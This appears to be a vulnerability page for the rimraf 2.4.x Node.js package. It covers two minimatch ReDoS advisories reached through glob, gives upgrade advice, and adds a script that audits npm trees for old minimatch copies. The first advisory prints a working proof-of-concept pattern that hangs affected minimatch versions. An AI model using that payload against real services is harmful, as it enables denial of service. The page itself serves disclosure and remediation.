Rimraf is a Node.js package providing a powerful and robust solution for recursively deleting files and directories, akin to the rm -rf command in Unix-like systems. Versions 2.4.0 and 2.4.1 offer similar core functionalities for developers needing to ensure complete and forceful removal of file system elements in their applications. Both versions depend on glob for file pattern matching and include development dependencies like tap for testing and mkdirp for directory creation during development. They are licensed under ISC and maintain the same author and repository information.
The difference between version 2.4.0 and 2.4.1 lies in the release date and, at most, small bug fixes or internal improvements: version 2.4.1 was released on June 30, 2015, after version 2.4.0 on June 7, 2015. Developers should use the later of the two (2.4.1), both for any fixes it carries and to keep dependency updates simple. The core functionality is the same, but a patch release like this typically addresses edge cases or small performance issues, which makes the newer version the better choice for applications that need reliable recursive deletion. Note that the vulnerabilities listed below are not in rimraf's own code; they are in minimatch, which rimraf reaches through its glob dependency, so the rimraf version alone does not tell you whether you are exposed.
All vulnerabilities affecting version 2.4.1 of the package
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern). rimraf 2.4.1 does not depend on minimatch directly: it depends on glob, and glob depends on minimatch, so the copy that rimraf's glob resolves to is the one that matters. The exposure is only real if a pattern derived from untrusted input reaches rimraf (or glob) in your application; a hard-coded cleanup pattern cannot be attacked this way.
var minimatch = require("minimatch");
// utility function for generating long strings
var genstr = function (len, chr) {
var result = "";
for (var i = 0; i <= len; i++) {
result = result + chr;
}
return result;
}
// pathological pattern: an unterminated negated character class followed by
// roughly one million backslashes, which drives minimatch's pattern
// translation into catastrophic backtracking
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit: the second call never returns in a reasonable time on affected versions.
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update minimatch to version 3.0.2 or later. Because rimraf pulls minimatch in through glob, that means upgrading rimraf (or glob) to a release whose glob dependency resolves to minimatch 3.0.2 or newer, then confirming with `npm ls minimatch` that no older copy remains anywhere in the tree; a single nested pre-3.0.2 copy under another package is still reachable.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package (CVE-2022-3517). This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service. The fix is in minimatch 3.0.5, so an install that satisfied the earlier 3.0.2 advisory is still affected by this one until it is brought to 3.0.5 or later; again, `npm ls minimatch` shows every resolved copy.
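Both advisories above come down to the same question for a rimraf user: which minimatch versions are actually resolved in the dependency tree, and are any of them below the fixed release (3.0.2 for the pattern-argument ReDoS, 3.0.5 for the braceExpand ReDoS)? The following is an added example, not code from rimraf, glob or minimatch, that walks a tree in the shape produced by `npm ls --json --all` and reports every installed copy that is below either threshold. The tree it audits is constructed inline to mirror the rimraf > glob > minimatch chain; the package names `other-tool` and `newer-tool` and all version numbers in it are assumptions for illustration, not taken from any real lockfile.

```javascript
// Added example: audit an npm dependency tree for vulnerable minimatch copies.
// Not part of rimraf, glob or minimatch. The tree below is constructed for the
// example; package names other than rimraf/glob/minimatch and all version
// numbers are assumptions.

// Fixed releases from the two advisories on this page.
const FIXES = [
  { name: 'minimatch', fixed: '3.0.2', issue: 'ReDoS in minimatch(path, pattern)' },
  { name: 'minimatch', fixed: '3.0.5', issue: 'ReDoS in braceExpand (CVE-2022-3517)' },
];

// Same shape as `npm ls --json --all` output:
// { name, version, dependencies: { <name>: { version, dependencies } } }
const constructedTree = {
  name: 'app',
  version: '1.0.0',
  dependencies: {
    rimraf: {
      version: '2.4.1',
      dependencies: {
        glob: {
          version: '4.5.3',
          dependencies: { minimatch: { version: '2.0.10' } },
        },
      },
    },
    'other-tool': {
      version: '1.2.3',
      dependencies: { minimatch: { version: '3.0.4' } },
    },
    'newer-tool': {
      version: '0.1.0',
      dependencies: { minimatch: { version: '3.1.2' } },
    },
  },
};

// Numeric major.minor.patch comparison. Pre-release suffixes are dropped,
// which is enough for comparing released minimatch versions.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Depth-first walk collecting every installed copy of `target`, with the
// dependency path that pulls it in, since nested copies are the usual reason
// an "upgraded" tree still contains an old version.
function findInstalls(node, target, path = [], out = []) {
  for (const [name, dep] of Object.entries(node.dependencies || {})) {
    const here = [...path, `${name}@${dep.version}`];
    if (name === target) out.push({ version: dep.version, path: here.join(' > ') });
    findInstalls(dep, target, here, out);
  }
  return out;
}

// One finding per (installed copy, unmet fix): a 2.x copy is reported twice,
// a 3.0.4 copy once, a 3.0.5+ copy not at all.
function audit(tree) {
  const findings = [];
  for (const fix of FIXES) {
    for (const inst of findInstalls(tree, fix.name)) {
      if (compareVersions(inst.version, fix.fixed) < 0) {
        findings.push({ ...inst, issue: fix.issue, fixed: fix.fixed });
      }
    }
  }
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of audit(constructedTree)) {
    console.log(`${f.path}: ${f.version} < ${f.fixed} (${f.issue})`);
  }
}
```

To run this against a real project, replace `constructedTree` with `JSON.parse` of the output of `npm ls --json --all` (older npm: `npm ls --json`); the traversal and thresholds need no change. A tree is clean only when `audit` returns an empty list, which is the condition the prose above describes as "no older copy remains".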